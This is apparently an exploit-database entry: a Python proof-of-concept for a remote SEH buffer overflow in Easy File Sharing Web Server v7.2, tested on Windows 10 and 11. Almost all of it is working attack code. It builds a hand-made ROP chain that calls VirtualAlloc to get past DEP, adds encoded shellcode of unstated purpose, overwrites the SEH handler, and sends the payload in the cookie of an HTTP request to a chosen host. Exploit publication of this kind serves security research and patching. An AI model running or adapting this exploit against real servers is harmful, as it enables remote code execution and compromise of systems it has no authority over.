Easy File Sharing Web Server v7.2 - Buffer Overflow

# Exploit title: Easy File Sharing Web Server v7.2 - Buffer Overflow
# Date: 16/10/2025
# Exploit Author: Donwor
# X: @real_Donwor
# Discord: Donwor
# Website: https://github.com/D0nw0r
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows 10,11
#
# Notes:
# - I wanted to re-do other PoCs because I did not want to use mona rop chain, so instead I built my own for practice and I believe it can help others.
# - The ROP chain was VERY challenging to build, mainly because there were a lot of limimitations when moving data between for example EAX and ESI
# - based on DEP SEH buffer overflow exploit by Knaps (https://www.exploit-db.com/exploits/38829/)
# - bad chars: '\x00' and '\x3b'



import struct, sys, socket


host = sys.argv[1]
port = 80
size = 5000


rop = struct.pack("<I", 0x1001ba81) # # MOV EAX,EBP # POP EDI # POP ESI # POP EBP # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0x41414141) # junk for pop edi
rop += struct.pack("<I", 0x41414141) # junk for pop edi
rop += struct.pack("<I", 0x41414141) # junk for ebp
rop += struct.pack("<I", 0x1001db66) # :  # POP ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0xffffeff8) # pop esi to align eax, will point after the hybjks
rop += struct.pack("<I", 0x10022f45) #  # SUB EAX,ESI # POP EDI # POP ESI # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0x41414141) #  # SUB EAX,ESI # POP EDI # POP ESI # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0x41414141) #  # SUB EAX,ESI # POP EDI # POP ESI # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x61c0a798) # XCHG EAX,EDI # RETN    )
rop += struct.pack("<L", 0x1001d626) # :  # XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # (RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
## Save ESP on ESI and EDI

rop += struct.pack("<L", 0x10015442) # :  # POP EAX # RETN
rop += struct.pack("<L", 0x1004D1FC) # VirtualAlloc Addr on IAT
rop += struct.pack("<L", 0x1002248c) # deref VirtualAlloc :  # MOV EAX,DWORD PTR [EAX] # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001a8e3) # put virtualalloc addr on stack  # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x41414141) # junk pop ebx
rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi(RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) # increase esi to point 4 bytes more (next arg) (RVA : 0x0001715d) : # INC ESI # ADD AL,3A # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
# Virtual Alloc on stack
# Esi now has "SRP" we need to fill it
# EDI still points to orignal one (Virtual alloc)


rop += struct.pack("<L", 0x1001f595) # Put SRP addr on eax MOV EAX,ESI # POP ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # eax now points to x more (can be changed)
rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001e80b) # This immedeately patches SRP and VirtualAlloc 1st arg! MOV DWORD PTR [ESI+8],EAX # MOV DWORD PTR [ESI+4],EAX # POP ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi

# Virtual alloc | SRP | Shellcode Addr
# edi -> virtualalloc

rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) # increase esi to point 12 bytes more (->dwsize) # INC ESI # ADD AL,3A # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001c15d) # XOR EAX,EAX # RETN) #
rop += struct.pack("<L", 0x10015442) # :  # POP EAX # RETN
rop += struct.pack("<L", 0xffffffff) # -1
rop += struct.pack("<L", 0x100231d1) # will turn eax into 1, second arg of virtualalloc NEG EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}) #
rop += struct.pack("<L", 0x1001a8e3) # patch arg  # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x41414141) # junk pop ebx

#VirtualAlloc | SRP | ShellcodeAddr | dwSize
# edi -> virtualalloc


rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) # increase esi to point 16 bytes more (->flAllocation Type) # INC ESI # ADD AL,3A # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x10015442) # :  # POP EAX # RETN
rop += struct.pack("<I", 0xffffefff) #  value to pop eax now
rop += struct.pack("<L", 0x100231d1) # will turn eax into 1002  NEG EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}) #
rop += struct.pack("<I", 0x1001b7ca)# eax now 1000  # DEC EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001a8e3) # patch arg  # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x41414141) # junk pop ebx

#VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType
# edi -> virtualalloc

rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) # increase esi to point 20 bytes more (->flProtect Type) # INC ESI # ADD AL,3A # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x10015442) # :  # POP EAX # RETN
rop += struct.pack("<I", 0xffffffbf) # :  -41
rop += struct.pack("<L", 0x100231d1) # will turn eax into 41  NEG EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}) #
rop += struct.pack("<I", 0x1001b7ca)# eax now 40  # DEC EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001a8e3) # patch arg  # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x41414141) # junk pop ebx

#VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType | flProtect
# edi -> virtualalloc


rop += struct.pack("<L", 0x61c0a798) # # XCHG EAX,EDI # RETN
rop += struct.pack("<L", 0x61c07ff8) # XCHG EAX,ESP # RETN

# Just switch execution now, move the stack pointer to EDI (VirtualAlloc)


sc =  b""
sc += b"\x81\xc4\x24\xfa\xff\xff" # add esp , -1500
sc += b"\xbd\x04\xae\x2a\x98\xdb\xce\xd9\x74\x24\xf4\x5b"
sc += b"\x31\xc9\xb1\x5e\x83\xeb\xfc\x31\x6b\x11\x03\x6b"
sc += b"\x11\xe2\xf1\x52\xc2\x17\xf9\xaa\x13\x48\xc8\x78"
sc += b"\x9a\x6d\x4e\xf6\xcf\x5d\x05\x5a\xfc\x16\x4b\x4f"
sc += b"\x77\x5a\x43\x60\x30\xd1\xb5\x4f\xc1\xd7\x79\x03"
sc += b"\x01\x79\x05\x5e\x56\x59\x34\x91\xab\x98\x71\x67"
sc += b"\xc1\x75\x2f\xf3\x7b\x9a\x44\x41\x40\xcd\x5b\x96"
sc += b"\x33\xb1\x23\x93\x84\x46\x9f\x9a\xd4\xf7\x94\xc5"
sc += b"\xf4\x7c\xe2\xed\xf5\x51\x77\xc4\x82\x69\x3e\xe6"
sc += b"\x95\x19\xf4\x83\x6b\xc8\xc5\x53\xc7\x35\xea\x59"
sc += b"\x19\x71\xcc\x81\x6c\x89\x2f\x3f\x77\x4a\x52\x9b"
sc += b"\xf2\x4d\xf4\x68\xa4\xa9\x05\xbc\x33\x39\x09\x09"
sc += b"\x37\x65\x0d\x8c\x94\x1d\x29\x05\x1b\xf2\xb8\x5d"
sc += b"\x38\xd6\xe1\x06\x21\x4f\x4f\xe8\x5e\x8f\x37\x55"
sc += b"\xfb\xdb\xd5\x80\x7b\x24\x26\xad\x21\xb3\xeb\x60"
sc += b"\xda\x43\x63\xf2\xa9\x71\x2c\xa8\x25\x3a\xa5\x76"
sc += b"\xb1\x4b\xa1\x88\x6d\xf3\xa1\x76\x8e\x04\xe8\xbc"
sc += b"\xda\x54\x82\x15\x63\x3f\x52\x99\xb6\xaa\x58\x0d"
sc += b"\xf9\x83\x64\xc7\x91\xd1\x94\xd6\xda\x5f\x72\x88"
sc += b"\x4c\x30\x2a\x69\x3d\xf0\x9a\x01\x57\xff\xc5\x32"
sc += b"\x58\xd5\x6e\xd8\xb7\x80\xc7\x75\x21\x89\x93\xe4"
sc += b"\xae\x07\xde\x27\x24\xa2\x1f\xe9\xcd\xc7\x33\x1e"
sc += b"\xaa\x27\xcb\xdf\x5f\x28\xa1\xdb\xc9\x7f\x5d\xe6"
sc += b"\x2c\xb7\xc2\x19\x1b\xcb\x04\xe5\xda\xfa\x7f\xd0"
sc += b"\x48\x43\x17\x1d\x9d\x43\xe7\x4b\xf7\x43\x8f\x2b"
sc += b"\xa3\x17\xaa\x33\x7e\x04\x67\xa6\x81\x7d\xd4\x61"
sc += b"\xea\x83\x03\x45\xb5\x7c\x66\xd5\xb2\x83\xf5\xf2"
sc += b"\x1a\xec\x05\x43\x9b\xec\x6f\x43\xcb\x84\x64\x6c"
sc += b"\xe4\x64\x85\xa7\xad\xec\x0c\x26\x1f\x8c\x11\x63"
sc += b"\xc1\x10\x12\x80\xda\xa3\x69\xe9\xdd\x43\x8e\xe3"
sc += b"\xb9\x43\x8f\x0b\xbc\x78\x46\x32\xca\xbf\x5b\x01"
sc += b"\xd5\x5d\x71\x7c\x7e\xf8\x10\x3d\xe3\xfb\xcf\x02"
sc += b"\x1a\x78\xe5\xfa\xd9\x60\x8c\xff\xa6\x26\x7d\x72"
sc += b"\xb6\xc2\x81\x21\xb7\xc6"


padding = b"\x45" * 4 # 4 bytes of padding because of the alignment, the add eax,20 instructions will make it so stack points 4 bytes after
rop += padding
rop += sc
rop += b"\x42" * (1244 - len(rop))


nseh = struct.pack("<I", 0x43434343)
seh = struct.pack("<I", 0x10022877) # add esp, 1004; ret
eax_offset = 4183

buf = b"A" * 2811 # rop chain start after add esp 1004
buf += rop
buf += b"A" * (4059 - len(buf))  #nseh
buf += nseh + seh
buf += b"A" * (eax_offset - len(buf))
buf += struct.pack("<I", 0xffffffff) #" #make sure eax always trigger exception
buf += b"A" * (size - len(buf))


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host ,port))

httpreq = (
b"GET /changeuser.ghp HTTP/1.1\r\n"
b"User-Agent: Mozilla/4.0\r\n"
b"Host:" + host.encode() + b":" + str(port).encode() + b"\r\n"
b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
b"Accept-Language: en-us\r\n"
b"Accept-Encoding: gzip, deflate\r\n"
b"Referer: http://" + host.encode() + b"/\r\n"
b"Cookie: SESSIONID=6771; UserID=" + buf + b"; PassWD=;\r\n"
b"Conection: Keep-Alive\r\n\r\n"
)

# Send payload to the server
try:
    if len(sys.argv) < 2:
        print("[!] Usage: python3 exploit.py <IP of Server>")
        sys.exit(1)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(httpreq)
    s.close()
    print("[+] Packet sent!")
except:
    print("[!] Could not connect to server / Exploit failed")
    sys.exit(1)

sys.exit(0)